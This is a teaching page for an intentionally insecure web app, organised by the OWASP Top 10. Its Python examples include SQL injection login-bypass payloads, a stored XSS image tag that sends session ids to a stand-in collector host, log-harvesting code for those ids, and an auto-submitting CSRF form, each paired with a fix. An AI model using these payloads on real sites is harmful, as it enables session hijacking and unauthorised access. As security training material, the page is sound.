Intentionally Insecure Web App

Updated 2015-09-25

BunchOfFriends (formerly named FriendFace) is an intentionally insecure social network for teaching web security. It was developed for Java EE 7 with a Derby/JavaDB or MySQL database and has been tested on the GlassFish 4.1 application server. It is designed to contain many of the OWASP Top 10 (2013) vulnerabilities.

Download BunchOfFriends:

Before deployment: create a JDBC resource named “jdbc/aip” (without the quotes) on the application server, pointing at your JavaDB or MySQL database. On each deployment the application automatically (re)creates the database tables and pre-populates them with sample data, so any changes you made to the data are discarded when you redeploy.

Requirements: JavaDB or MySQL is required (for other databases you will need to modify SampleData.java). Java EE 7 is required, so you will need GlassFish 4.1 (or higher) or an equivalent application server. It should also work on GlassFish 4.0 if you upgrade GlassFish to JSF/Mojarra 2.2.2 or higher. One way to get all of these dependencies at once is to download the Java EE bundle of NetBeans: from its Services tab you can create JavaDB databases, launch GlassFish and open the domain admin console.

Purpose: I created the system while teaching a subject on advanced internet programming. It is intended to help teach a security mindset. Feel free to use it for any purpose. However, you should not deploy it on a publicly accessible server because it is so insecure: run it only on localhost or on an isolated network.

License: Feel free to use it however you wish - it is under a Creative Commons Zero / Public Domain license.

BunchOfFriends is an alternative to the OWASP WebGoat project. WebGoat is tutorial-oriented: it is a set of guided exercises. In contrast, BunchOfFriends is an ordinary application that happens to be full of security holes, so students have to find the holes themselves.

BunchOfFriends can be used to re-create something like the “Samy” MySpace worm. Because profile fields are not escaped, you can create a profile whose name carries script that runs in the browser of anyone who views it and makes that viewer befriend you, so the profile virally becomes friends with anybody who sees the profile name.

The following discusses how each of the OWASP Top 10 (2013) categories relates to the application.

A1. Injection

SQL queries are built from user input that is not properly escaped or parameterised. You can use SQL injection in the login form to log in without a valid password.
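The login bypass described above, as an added example that is not BunchOfFriends code: the query built from unescaped input beside the parameterised version, run against an in-memory SQLite table that stands in for the application's Derby/MySQL user table. The user names and passwords are constructed sample data.

```python
"""Added example (not BunchOfFriends code): SQL injection in a login query."""
import sqlite3

# Constructed sample data standing in for the app's pre-populated users table.
SAMPLE_USERS = [("alice", "hunter2"), ("bob", "letmein")]


def make_db():
    """In-memory SQLite stand-in for the Derby/MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The bug the page describes: credentials are concatenated into the SQL text,
    so quotes in the input change the structure of the query."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is only ever data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Comment out the password check and pick the account by name.
    print(login_vulnerable(db, "alice' --", "anything"))    # alice
    # Tautology in the password field: matches every row.
    print(login_vulnerable(db, "", "' OR '1'='1"))           # some user
    print(login_safe(db, "alice' --", "anything"))           # None
```

The `' OR '1'='1` payload works unchanged on SQLite, Derby and MySQL; the `--` comment form needs a trailing space on MySQL (`-- `). The plaintext password comparison itself is the A6 problem below.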

A2. Broken Authentication and Session Management

If cookies are disabled in your browser, the servlet container falls back to URL rewriting and carries the session id in the URL (as ;jsessionid=...), over plain HTTP. Combined with XSS, a page can be made to load a resource from a third-party server; the browser then sends the session-carrying URL to that server in the Referer header, which is enough to hijack the other user's session.

A3. Cross-Site Scripting (XSS)

Most inputs are not validated and most outputs are not escaped, so script stored in profile fields is executed in the browser of whoever views them.
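The A2/A3 chain above, as an added example that is not BunchOfFriends code: the stored payload an attacker would put in an unescaped profile field, the escaped rendering that neutralises it, and the attacker-side extraction of the session id from the Referer values in the collecting server's log. The collector host, the log lines and the session id are constructed for the example.

```python
"""Added example (not BunchOfFriends code): XSS leaking a URL-rewritten session id."""
import html
import re
from urllib.parse import urlsplit

# The collecting host and the log format below are assumptions for the example.
COLLECTOR = "http://collector.example/pixel.gif"


def xss_payload(collector=COLLECTOR):
    """What an attacker stores in an unescaped profile field: a 1x1 image on
    the third-party server, so every viewer's browser fetches it."""
    return f'<img src="{collector}" width="1" height="1">'


def render_unescaped(name):
    """How the app renders a field today: the stored tag becomes live markup."""
    return f"<h1>{name}</h1>"


def render_escaped(name):
    """Fix for an HTML text context: the same payload is shown as text."""
    return f"<h1>{html.escape(name, quote=True)}</h1>"


# URL rewriting puts the session id in the path as ";jsessionid=<id>".
JSESSIONID_RE = re.compile(r";jsessionid=([0-9a-z]+)", re.IGNORECASE)


def session_from_referer(referer):
    """Return the servlet session id carried in a Referer URL, or None."""
    if not referer.startswith(("http://", "https://")):
        return None
    match = JSESSIONID_RE.search(urlsplit(referer).path)
    return match.group(1) if match else None


# Constructed combined-format access-log lines from the collecting server.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2015:10:00:00 +1000] "GET /pixel.gif HTTP/1.1" 200 43 '
    '"http://localhost:8080/BunchOfFriends/profile.xhtml;jsessionid=2a8f1c7ef8f8b8d9c1a4e6b0f3d2a1b9?id=7" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2015:10:00:05 +1000] "GET /pixel.gif HTTP/1.1" 200 43 '
    '"-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'"(?:GET|HEAD) \S+ HTTP/[\d.]+" \d+ \S+ "([^"]*)"')


def harvest_sessions(log_lines):
    """Map every leaked session id to the URL it arrived in."""
    found = {}
    for line in log_lines:
        match = LOG_RE.search(line)
        if match:
            sid = session_from_referer(match.group(1))
            if sid:
                found[sid] = match.group(1)
    return found


if __name__ == "__main__":
    print(render_unescaped(xss_payload()))
    print(render_escaped(xss_payload()))
    print(harvest_sessions(SAMPLE_LOG))
```

With a harvested id, the attacker only has to append the same `;jsessionid=...` to a URL of the application to act as that user. Escaping alone closes A3; keeping the session id out of the URL (cookies only) and marking the cookie HttpOnly closes the leak path for A2.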

A4. Insecure Direct Object References

The application is vulnerable to URL editing: by changing the user identifier in the URL you can view the posts of somebody who is not a friend, without “friending” them.

A5. Security Misconfiguration

Pages intended for authenticated users are not properly secured. You can view the posts of a user without logging in at all.
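The check that closes both A4 and A5 on a posts page, as an added example that is not BunchOfFriends code: the current behaviour (trust the id in the URL) beside a handler that first requires a login and then requires ownership or friendship. Users, posts, friendships and sessions are constructed stand-ins for the application's tables.

```python
"""Added example (not BunchOfFriends code): authorisation for a posts page."""

# Constructed stand-ins for the app's users, posts, friendships and sessions.
POSTS = {1: ["alice: hello"], 2: ["bob: hi"], 3: ["carol: only for friends"]}
FRIENDS = {frozenset({1, 2})}                  # alice <-> bob; carol has no friends
SESSIONS = {"sess-alice": 1, "sess-bob": 2}    # session id -> logged-in user id


def view_posts_vulnerable(user_id):
    """The current behaviour: the id from the URL is trusted and nothing is checked."""
    return 200, POSTS.get(user_id, [])


def view_posts_checked(session_id, user_id):
    """Closes A5 (a login is required) and A4 (the viewer must own the posts or
    be friends with their owner). Returns an HTTP status and the posts."""
    viewer = SESSIONS.get(session_id)
    if viewer is None:
        return 401, []      # a real page would redirect to the login form
    if viewer != user_id and frozenset({viewer, user_id}) not in FRIENDS:
        return 403, []      # the id came from the URL; do not trust it
    return 200, POSTS.get(user_id, [])


if __name__ == "__main__":
    print(view_posts_vulnerable(3))             # (200, carol's posts) with no login
    print(view_posts_checked(None, 3))          # (401, [])
    print(view_posts_checked("sess-alice", 3))  # (403, [])
    print(view_posts_checked("sess-alice", 2))  # (200, bob's posts)
```

The order matters: the login check runs before any lookup, and the friendship check runs before any data is read. If you do not want to reveal whether a user id exists, return the same response for a forbidden target and a non-existent one.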

A6. Sensitive Data Exposure

The database stores passwords in plaintext, so usernames and passwords can be read by anyone with a direct SQL connection to the database.
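What the users table should hold instead, as an added example that is not BunchOfFriends code: a salted, deliberately slow hash (PBKDF2-HMAC-SHA256 from the Python standard library) with a constant-time verify, so a direct read of the table does not yield usable credentials. The iteration count and record format are choices made for the example.

```python
"""Added example (not BunchOfFriends code): salted password hashing and verification."""
import base64
import hashlib
import hmac
import os

ALGO = "pbkdf2_sha256"
ITERATIONS = 600_000   # a typical current figure; tune so one hash takes ~100 ms


def hash_password(password, salt=None):
    """Return a self-describing record 'algo$iterations$salt$hash' for storage.
    A fresh random salt per user means equal passwords give different records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([
        ALGO,
        str(ITERATIONS),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_b64, hash_b64 = record.split("$")
    except ValueError:
        return False
    if algo != ALGO:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    record = hash_password("hunter2")
    print(record)                              # what goes in the password column
    print(verify_password("hunter2", record))  # True
    print(verify_password("hunter3", record))  # False
```

Storing the iteration count in the record lets you raise it later without invalidating existing rows. In the Java EE application the same algorithm is available as `PBKDF2WithHmacSHA256` through `javax.crypto.SecretKeyFactory`, so SampleData.java would insert records of this form instead of plaintext.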

A7. Missing Function Level Access Control

The application does not have privileged users so this vulnerability is not applicable.

A8. Cross Site Request Forgery

You can create a third-party website that automatically causes any logged-in user who visits it to add a friend, because the browser attaches the user's session to the forged request and the application does not check where the request came from.
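The forged page and the fix, as an added example that is not BunchOfFriends code: the auto-submitting form a third-party site would serve, and a session-bound synchroniser token that the add-friend handler requires. The form action, the field names and the session ids are assumptions for the example.

```python
"""Added example (not BunchOfFriends code): CSRF page and synchroniser-token check."""
import hashlib
import hmac
import secrets

# Assumed target URL and form field of the add-friend action.
TARGET = "http://localhost:8080/BunchOfFriends/addFriend"


def csrf_page(attacker_user_id, target=TARGET):
    """The third-party page: submits the form as soon as it loads. The victim's
    browser attaches the victim's session, so the request looks legitimate."""
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'<form method="POST" action="{target}">\n'
        f'  <input type="hidden" name="friendId" value="{attacker_user_id}">\n'
        '</form>\n</body></html>'
    )


# Per-server secret; a third-party page cannot learn it or read the token.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session, embedded in every form the app renders."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def handle_add_friend(session_id, form):
    """Server side: reject unless the submitted token matches this session's token.
    Returns an HTTP status code."""
    submitted = form.get("csrfToken", "")
    if not hmac.compare_digest(submitted, issue_csrf_token(session_id)):
        return 403
    # ... record the friendship for the session's user here ...
    return 200


if __name__ == "__main__":
    print(csrf_page(9))
    token = issue_csrf_token("sess-alice")
    print(handle_add_friend("sess-alice", {"friendId": "9"}))                       # 403
    print(handle_add_friend("sess-alice", {"friendId": "9", "csrfToken": token}))   # 200
```

The forged form cannot include a valid token because the attacker's page cannot read the application's responses cross-origin, so the check alone defeats the attack. Note that the token is only as good as the session id it is bound to: if the session id leaks (see A2), so does the token.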

A9. Using Components with Known Vulnerabilities

To my knowledge, the application is not vulnerable to this problem. Monitor the GlassFish application server mailing list for current vulnerabilities, and keep GlassFish and the libraries it bundles (such as JSF/Mojarra) updated.

A10. Unvalidated Redirects and Forwards

The application does use a redirect that can be abused. However, I do not believe that it can be exploited in a way that couldn’t already be achieved by using direct URLs.

Published 28 December 2014 by Benjamin Johnston.